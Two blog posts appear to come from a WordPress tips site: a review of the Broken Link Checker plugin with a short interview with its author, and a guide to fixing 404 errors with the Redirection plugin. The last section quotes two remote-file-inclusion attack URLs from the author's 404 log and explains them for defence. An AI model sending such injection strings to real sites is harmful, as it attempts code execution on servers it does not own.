Need a WordPress website this weekend? Start here...

Broken Link Checker plugin for WordPress (review)

(Reading time: 7 – 11 minutes)

Broken links frustrate readers and make Google think you are a bad blogger. You will want to eliminate broken links from your blog, and keep them at bay.

Broken links come in two cases:

  1. There’s a bad link on your side, perhaps there is a typo or misspelling in your href attribute for your link.
  2. The web page has moved or disappeared on the target site.

Both cases apply to internal links to your blog posts and pages, and external or outbound links targeting web pages elswhere.

For Case 1, you may need to do a little sleuthing.

Sometimes the problem is obvious, sometimes it’s subtle. The first place to start is to copy the URL directly from the href attribute into your web browser and see what happens.

For example, I just fixed a URL that looked like this: http:http://somedomain.com/. Probably my fault, a cut and paste error.

For Case 2, links expire for any number of reasons.

On WordPress.com or Blogger blogs, the owner may delete the entire site. The blog or website owner may let the domain name expire, sometimes by accident, whence the registrar or a new owner parks the domain.

Usually there is little you can do except notify the site owner (if you can find him or her) and remove the link from your blog post.

However, if the link really is useful, you may be able to find the same web page at a different URL. Perhaps the site owner moved it for some reason, or a redirect was deleted. Google is your friend here.

Find and fix broken links

There’s a lot of ways to find broken links. You can examine all the pages on your blog, and click through on the links. But that’s so last millennium, and as Johnson Yip notes,

Clicking every link in your blog can be very time consuming for finding broken links.

Boring.

Instead, here’s three ways to automate that task:

  1. Use a web service such as the Link Checker – The W3C Markup Validation Service.

    Using any W3 tool is a smart idea, at least on an occasional basis. The W3 doesn’t have any commercial interest, and provides a neutral, third party analysis of your site. You may find that the W3 tools catch problems and issues other tools miss.

  2. Use Google Webmaster tools to investigate site crawl errors.

    I recommend checking your site with Webmaster tools no matter what, because you see what Google sees. No guesswork.

  3. For WordPress users, install the Broken Link Checker plugin.

I really like using the Broken Link Checker plugin for WordPress, and it’s my first defense against broken links.

Let’s take a closer look at this highly useful plugin.

Broken Link Checker features

First, here’s a list of important features:

  • Detects links that don’t work, including 404 Not Found, 410 Gone, 403 Forbidden, Connection Failed, 500 Internal Server Error, Timeout, and Server Not Found (DNS issue).
  • Detects missing images.
  • Periodically checks links in posts, pages, comments and the blogroll. Checking comments is especially important, and you will see after a few months that many of your commenter’s web sites will vanish! Unlink them.

    Trackbacks are also included in comment link checking.

  • New and modified entries are checked ASAP.
  • Notifies you on the Dashboard if any problems are found.
  • Lets you edit all instances of a specific link at once.
  • Gives you a list of all links ever posted on your site, with the ability to search and filter it.
  • Lets you apply custom CSS styles to broken and removed links.
  • Highly configurable.
  • Bug reporting and feature request forum! Forums are a lot of work; take this as a commitment from the plugin author.

Benefit: Broken Link Checker will save you a massive amount of time eliminating broken links.

Website In A Weekend has 5353 links (October 3, 2010).

Imagine checking all of those links by hand, or by submitting your blog pagewise to link checking services. Or even if you paid for a full-scale analysis for your blog, you would still have to dig into the posts and pages containing broken links one at a time.

Instead, the plugin saves you time by collecting every link which needs fixing into a simple, intuitive web interface.

Note: when you first install Broken Link Checker, it won’t have any results to report. The plugin needs to run for a while on your blog to collect data over time. If you prefer to keep the number of your plugins to an absolute minimum, install Broken Link Checker, let it run for a couple of weeks, then clean up the mess. If you like keeping your plugin count low, uninstall it after you clean up, then reinstall when you need it again.

Depending on your publishing schedule, repeat this link cleanup monthly to quarterly, you should be in good shape.

Case study: Gordie Rogers

Long time readers (bofem) will recognize – and welcome back – Gordie Rogers. Gordie used to publish a lifestyle design website and blog, but wasn’t able to make the numbers work at the time. So he took a bit of break, and now he’s back with Personal Development X.

Note: Gordie brings up a good point in the comments. If the broken link is “otherwise good,” use Broken Link Checker’s “ignore” feature instead of unlinking or deleting.

Gordie has loads of comments here on Website In A Weekend, all pointing to the old lifestyle design articles, and all currently broken.

Let’s give Gordie a hand. We’ll fix the broken links on Website In A Weekend, and get Gordie a few dozen (dofollow) backlinks for his new website. Here’s how we’ll do it:

  1. First, we’ll replace the lifestyle design URL in all of his comments.
  2. Then we’ll unlink, for now, all the CommentLuv links returning HTTP 404 errors.

This can be done fast, takes maybe 10 minutes. Here’s a 3 minute screencast to show you exactly how it works:

Brief excursion: canonical plugins

WordPress is sufficiently mature and has a sufficiently large user base (8% of the whole web), that it makes sense to maintain a “best of breed” list of plugins worth following in detail. Such plugins are characterized by:

  1. Usefulness.
  2. Good designed.
  3. Maturity.

Broken Link Checker meets these criteria, so it’s on the Official Website In A Weekend list. Expect more on this topic of canonical plugins, and how such a list fits into a “micro-niche” strategy for developing authority.

While I’m at it, here’s a few words from Janis Elsts, the plugin author.

µ-interview with Janis Elsts

WIAW: What was your main motivation for developing BLC? Frustration? The challenge of coding? Something else?

JE: I must admit I don’t really remember what the initial motivation was. I guess it was one of those lucky ideas, stumbling upon an unfulfilled need.

WIAW: How long have you been working on BLC?

JE: The first version of the plugin was released on 5th August, 2007. So, just over three years now.

WIAW: Offerring a Pro version indicates you are committed to BLC as a long(er) term project. Are you comfortable mentioning one or two features users might expect in the future?

JE: A few things that I would like to add, eventually :
* Link suggestions, i.e. automatically finding alternatives for broken links.
* Support for internationalized domain names.
* Bulk URL editing.

As you probably know, there is a dedicated forum where users can suggest new features and provide feedback:
Broken Link Checker forum.

Most likely, any new features (once implemented) will only be available to users who’ve purchased the Pro version.

Speaking of the Pro version…

Help keep Broken Link Checker up-to-date

Broken Link Checker also has a Pro version for the very reasonable price of $4.99 US (October 3, 2010).

The Pro version of Broken Link Checker is available from WP Plugins. It’s advertised through the plugin with a screen options tab (as of October 3, 2010).

By the way, I prefer to promote professional and paid versions of blogging tools, including plugins, and here’s why: it means the author of the plugin is taking his work seriously enough to realize his effort should be compensated. That reassures me that the time I take learning such tools won’t be wasted. Because it’s just horrible to sink hours, days, weeks or more of you life into a technology that dies. Paying a few bucks to help keep worthy technology alive and growing just makes sense.

Anyway, there you are, a great plugin and a few other ways to check broken links. Here’s a few questions for you:

Are you regularly checking for broken links?

If so, how?

If not why not?

Off to the comments!

Using Redirection Plugin For 404 Errors on WordPress Blogs

(Reading time: 6 – 10 minutes)

When someone comes to your website, and asks for a webpage that doesn’t exist, the webserver serves up a 404 ERROR PAGE NOT FOUND. Webpages get “lost” for various reasons, some of which you, the WordPress operator, have no control over:

  1. You may have deleted a page that is still a popular search result.
  2. You may have changed the page’s permalink without redirecting.
  3. Someone may have made a typo in the link. Could have been you, could have been someone else. If it’s a link in a popular webpage, you’re going to get a lot of 404 errors.
  4. You may be the subject of systematic hacking attacks.

You have several ways to attack 404 issues:

  1. Create a webpage dedicated to handling 404 errors, inform the server to deliver this page with the 404 error. All WordPress administrators should read what the WordPress Codex for Creating 404 Pages.
  2. Smarter bears use the “Smart 404″ plugin, which customizes the 404 page to deliver links to pages returned from using the WordPress search function with the incoming URL. Smart 404 might be a good topic for a future article, or a newsletter. Subscribe to RSS and the newsletter and you won’t miss it.
  3. Add a 301 redirection for the bad link, pointing it to a good link. Redirection handling 404 errors is the topic of this post, and we’ll use the Urban Giraffe Redirection plugin. If you haven’t installed, now is a good time. I’ll wait.

Once you have the Redirection plugin installed, read the instructions on the plugin home page. Then read and understand all 12 pages of comments and every thread on the discussion… then you will know far more about handling bad webpages than 99% of WordPress operators.

But that’s a lot of work.

If you’re in a hurry (who isn’t?), here’s a few tips on getting started really fast. Once you’re underway, and a have days or weeks of 404 log entries, THEN go back and read the plugin homepage and comments very carefully.

Systematically eliminate 404 errors

The key to handling 404 errors is learning what they mean, then get rid of them. Here’s my system, which will work for you as well:

  1. Pick one error
  2. Figure out what it is (wrong URL, hacking attempt, etc.)
  3. Fix it if necessary
  4. Search for that error and delete the rest of the errors just like it
  5. Move to the next error

Let’s find an error. Click on “Tools >> Redirection” to get to the redirection page, then Modules from the navigation links across the top of the Redirection page:
Click on "Hits" (red box) to see 404 error log

That was easy. Looks below like a bad link to the Favicon article is floating around the web somewhere. I vaguely recall changing the permalink… without adding a redirection…

…brief digression here. Take the time to do this stuff right the first time. It’s not that hard. Once the search engines grab your content and index it, these completely preventable error are going to plague you for months or years.

Ok, continuing… top of the log shows a favicon post:

favicon article has a bad permalink floating around the web somewhere.

favicon article has a bad permalink floating around the web somewhere.

Click on the bad link, it will come up as a 404 page. Leave this page handy, we’ll use it to check the new 301 redirection. Next, find the correct URL. I usually have to run a search to find it. Leave this open in a window as well. Now navigate to the Redirects link on the administration page:

Adding 301 redirection for bad favicon link

Adding 301 redirection for bad favicon link

Click “Add Redirection.”

Now go back to the 404 page served on the bad link. Refresh the page. If the redirection works, you should get the correct page. If it doesn’t work, check all your links carefully, there’s a typo or something equally trivial floating around.

That’s all there is too it.

Tips for creating redirections

Trailing slashes: you MUST get the trailing slashes right. I recently lost many click throughs because I added a trailing slash to a redirection: “/wordpress101/” is not the same as “/wordpress101.” That trailing slash matters. It 404′ed them all. I found it within 2 hours of posting, but a lot of damage was already done. I would have saved myself some grief had I tested the link before publishing.

If you have a really bad permalink on a blog post, consider changing tightening up the permalink and add a redirection from the old to the new. Then watch your 404 log and your 301 redirection log very carefully to make sure everything is working correctly.

Featured posts can be redirected using very short slugs. Add the slug to the 301 log, give it a target, test it, then watch your 301 and 404 logs to make sure it’s working.

Put your 404 log into your RSS feed. It’s easy. See the screenshot below of the Redirection admin page. Click the [Modules] link (green box) to get to display the WordPress, Apache and 404 Error modules. Right click and copy link for the [RSS] link; paste that link into your RSS reader. I use Google Reader, works great.

Redirection has powerful HTTP 404 Error monitoring

Redirection has powerful HTTP 404 Error monitoring

404 Fear and Loathing

Examining your 404 log can be a terrifying. Adding 301 links as discussed above isn’t too difficult, and is easy to understand. Attacks by malicious hackers is a whole ‘nother story. Here’s a few of the odd things you may find in your 404 log after a week or two:

  1. /extending-wordpress//includes/header.php?c_temp_path=http://www.leeminhothailand.com/board/admin.txt????

    What the hell is that?

    I poked around a bit, and it turns out that Lee Min Ho is a popular Korean heartthrob. The “leeminhothailand” resolves to a Lee Ho Min Thailand Fan Club home page, and the “admin.txt????” resolves to a hack: “arage was here” where Mr Arage extracts the host details (e.g., uname) for the web page. Presumably, since this was logged in my 404 log, his attack wasn’t successfully launched from Website In A Weekend. You may or may not wish to extend a birthday greeting to Mr Lee.

  2. Here’s another one: ​/head.php?adresa=http:​/​/www.stmaryofthecataract.com​/images​/save.jpg?

    Our hacker here attempted to pass the url to the WordPress head.php file for further processing. head.php wasn’t interested, and declined with a 404 error.

    Somebody’s been a busy bee, check out this Google search on the St. Mary’s of the Cataract URL. Nasty.

  3. Requests for the files owssvr.dll and cltreq.asp aren’t attacks to compromise security, these are used by IE to see if there is a web discussion forum that is compatible with IE. If you are being served by an Apache server, these files won’t exist. This is not a problem.
  4. Requests ending in a ?filename.php probably indicate an exploit, likely long since closed for current versions of WordPress. See issue 5427 and changeset 11596 for more information.

Your best bet for heading off hackers is to keep your WordPress installation reasonably up to date, and implement common security precautions such as deleting the “admin” user. Anyone really determined to hack your site will be hard to stop… fortunately, most hackers don’t want to damage your site, they simply want to use it without anyone fnding out. Take precautions, but don’t worry too much.